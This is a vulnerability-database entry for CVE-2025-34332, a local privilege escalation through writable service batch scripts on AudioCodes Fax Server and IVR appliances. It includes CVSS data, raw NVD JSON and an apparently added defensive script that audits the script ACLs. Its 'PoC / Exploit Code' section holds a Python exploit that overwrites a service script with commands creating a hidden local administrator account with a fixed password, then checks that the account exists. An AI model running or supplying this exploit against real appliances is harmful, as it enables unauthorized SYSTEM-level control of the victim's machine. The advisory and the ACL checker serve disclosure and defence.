Security Vulnerability Report
CVE-2025-34332 CVSS 7.8 HIGH

CVE-2025-34332

Published: 2025-11-19 17:15:48
Last Modified: 2025-12-11 21:19:07

Description

AudioCodes Fax Server and Auto-Attendant IVR appliances versions up to and including 2.6.23 include a web administration component that controls back-end Windows services using helper batch scripts located under C:\F2MAdmin\F2E\AudioCodes_files\utils\Services. When certain service actions are requested through ajaxPost.php, these scripts are invoked by PHP using system() under the NT AUTHORITY\SYSTEM account. The batch files in this directory are writable by any authenticated local user due to overly permissive ACLs, allowing them to replace script contents with arbitrary commands. On the next service start/stop operation, the modified script is executed as SYSTEM, enabling elevation of local privileges.
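A defender-side check for the ACL weakness described above, as an added example that is not part of the original record or of any vendor tooling: it parses `icacls` output for the batch scripts and reports allow-ACEs that let a principal outside a trusted set modify them. The sample output, the script file names and the trusted-principal list are constructed assumptions.

```python
import re

# Principals expected to hold write access (assumed list; English account names).
TRUSTED = {"nt authority\\system", "builtin\\administrators",
           "nt service\\trustedinstaller"}
# icacls right codes that permit changing a file's content, ACL or owner.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "GA", "GW", "WDAC", "WO"}
FIRST_LINE = re.compile(r"^(?P<path>\S.*?\.bat) (?P<ace>\S.*)$", re.I)
ACE = re.compile(r"^(?P<who>[^:]+):(?P<perms>(?:\([^)]*\))+)$")

# Constructed sample of icacls output; file names are placeholders and the
# continuation-line indentation is shortened.
SAMPLE = r"""C:\F2MAdmin\F2E\AudioCodes_files\utils\Services\start_example.bat BUILTIN\Users:(I)(M)
    NT AUTHORITY\SYSTEM:(I)(F)
    BUILTIN\Administrators:(I)(F)

C:\F2MAdmin\F2E\AudioCodes_files\utils\Services\stop_example.bat NT AUTHORITY\SYSTEM:(F)
    BUILTIN\Users:(RX)

Successfully processed 2 files; Failed processing 0 files
"""

def risky_aces(icacls_output):
    """Return (path, principal, rights) for every allow-ACE that lets an
    untrusted principal modify a .bat file listed in icacls output."""
    findings, path = [], None
    for line in icacls_output.splitlines():
        if not line.strip():
            path = None                      # blank line ends a file's ACL
            continue
        first = FIRST_LINE.match(line)
        if first:                            # "<path> <principal>:<perms>"
            path, ace_text = first["path"], first["ace"].strip()
        elif line[0].isspace() and path:     # indented continuation ACE
            ace_text = line.strip()
        else:                                # summary line or other noise
            continue
        ace = ACE.match(ace_text)
        groups = re.findall(r"\(([^)]*)\)", ace["perms"]) if ace else []
        if not ace or "DENY" in groups:      # deny ACEs grant nothing
            continue
        rights = {r for g in groups for r in g.split(",")} & WRITE_RIGHTS
        if rights and ace["who"].lower() not in TRUSTED:
            findings.append((path, ace["who"], sorted(rights)))
    return findings

if __name__ == "__main__":
    print(risky_aces(SAMPLE))
```

On a live appliance, feed it the output of `icacls "C:\F2MAdmin\F2E\AudioCodes_files\utils\Services\*.bat"`; any finding marks a script whose write ACEs for non-administrative principals should be removed.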

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:audiocodes:fax_server:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:audiocodes:interactive_voice_response:*:*:*:*:*:*:*:* - VULNERABLE
AudioCodes Fax Server <= 2.6.23
AudioCodes Auto-Attendant IVR <= 2.6.23

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-34332 AudioCodes Fax Server LPE PoC
# This PoC demonstrates local privilege escalation via writable service scripts
import os
import subprocess
import time

TARGET_DIR = r'C:\F2MAdmin\F2E\AudioCodes_files\utils\Services'
BACKUP_EXT = '.bak'


def check_script_permissions():
    """Check if service scripts are writable by current user"""
    if not os.path.exists(TARGET_DIR):
        print(f"[-] Target directory not found: {TARGET_DIR}")
        return False
    scripts = [f for f in os.listdir(TARGET_DIR) if f.endswith('.bat')]
    writable_scripts = []
    for script in scripts:
        script_path = os.path.join(TARGET_DIR, script)
        # Check write permission
        if os.access(script_path, os.W_OK):
            writable_scripts.append(script)
            print(f"[+] Writable script found: {script}")
    return writable_scripts


def backup_script(script_path):
    """Backup original script content"""
    backup_path = script_path + BACKUP_EXT
    try:
        with open(script_path, 'r') as f:
            original_content = f.read()
        with open(backup_path, 'w') as f:
            f.write(original_content)
        print(f"[+] Backup created: {backup_path}")
        return original_content
    except Exception as e:
        print(f"[-] Backup failed: {e}")
        return None


def inject_payload(script_path, payload):
    """Inject malicious payload into script"""
    try:
        with open(script_path, 'w') as f:
            f.write(payload)
        print(f"[+] Payload injected into: {script_path}")
        return True
    except Exception as e:
        print(f"[-] Injection failed: {e}")
        return False


def trigger_service_action():
    """Trigger service action via ajaxPost.php to execute modified script"""
    # This would typically be an HTTP request to the web interface
    # Example: POST request to ajaxPost.php with service action parameters
    print("[*] Triggering service action via web interface...")
    print("[*] Waiting for scheduled service operation...")
    time.sleep(5)
    return True


def main():
    print("=" * 60)
    print("CVE-2025-34332 AudioCodes Fax Server LPE Exploit")
    print("=" * 60)

    # Step 1: Check for writable scripts
    print("\n[Step 1] Checking script permissions...")
    writable_scripts = check_script_permissions()
    if not writable_scripts:
        print("[-] No writable scripts found or not vulnerable")
        return

    # Step 2: Select target script and backup
    target_script = writable_scripts[0]
    script_path = os.path.join(TARGET_DIR, target_script)
    print(f"\n[Step 2] Backing up original script...")
    original_content = backup_script(script_path)
    if not original_content:
        return

    # Step 3: Inject malicious payload
    print("\n[Step 3] Injecting privilege escalation payload...")
    # Payload: Create a new admin user
    payload = f'''@echo off
REM Malicious payload for CVE-2025-34332
net user ExploitUser P@ssw0rd123 /add
net localgroup Administrators ExploitUser /add
REM Restore original script content
{original_content}
'''
    inject_payload(script_path, payload)

    # Step 4: Trigger service action
    print("\n[Step 4] Triggering service action...")
    trigger_service_action()

    # Step 5: Verify exploitation
    print("\n[Step 5] Verifying privilege escalation...")
    result = subprocess.run('net user ExploitUser', capture_output=True, text=True)
    if 'ExploitUser' in result.stdout:
        print("[+] SUCCESS: New admin user created!")
        print("[+] Username: ExploitUser")
        print("[+] Password: P@ssw0rd123")
    else:
        print("[-] Exploitation may have failed or requires manual trigger")
    print("\n[!] Remember to restore original script after testing")


if __name__ == '__main__':
    main()
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-34332", "sourceIdentifier": "[email protected]", "published": "2025-11-19T17:15:48.133", "lastModified": "2025-12-11T21:19:07.110", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "AudioCodes Fax Server and Auto-Attendant IVR appliances versions up to and including 2.6.23 include a web administration component that controls back-end Windows services using helper batch scripts located under C:\\\\F2MAdmin\\\\F2E\\\\AudioCodes_files\\\\utils\\\\Services. When certain service actions are requested through ajaxPost.php, these scripts are invoked by PHP using system() under the NT AUTHORITY\\\\SYSTEM account. The batch files in this directory are writable by any authenticated local user due to overly permissive ACLs, allowing them to replace script contents with arbitrary commands. On the next service start/stop operation, the modified script is executed as SYSTEM, enabling elevation of local privileges."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", 
"modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-276"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:audiocodes:fax_server:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.6.23", "matchCriteriaId": "A325B684-937A-4AE9-A8B2-235ADB2D1932"}, {"vulnerable": true, "criteria": "cpe:2.3:a:audiocodes:interactive_voice_response:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.6.23", "matchCriteriaId": "131420AA-FE49-42FC-A8EC-50C5EB40D3A3"}]}]}], "references": [{"url": "https://pierrekim.github.io/advisories/2025-audiocodes-fax-ivr.txt", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://pierrekim.github.io/blog/2025-11-20-audiocodes-fax-ivr-8-vulnerabilities.html", "source": "[email protected]", "tags": ["Exploit", "Third 
Party Advisory"]}, {"url": "https://www.audiocodes.com/media/g1in2u2o/0548-product-notice-end-of-service-for-audiocodes-auto-attendant-ivr-solution.pdf", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/audiocodes-fax-ivr-appliance-insecure-service-control-scripts-lpe", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}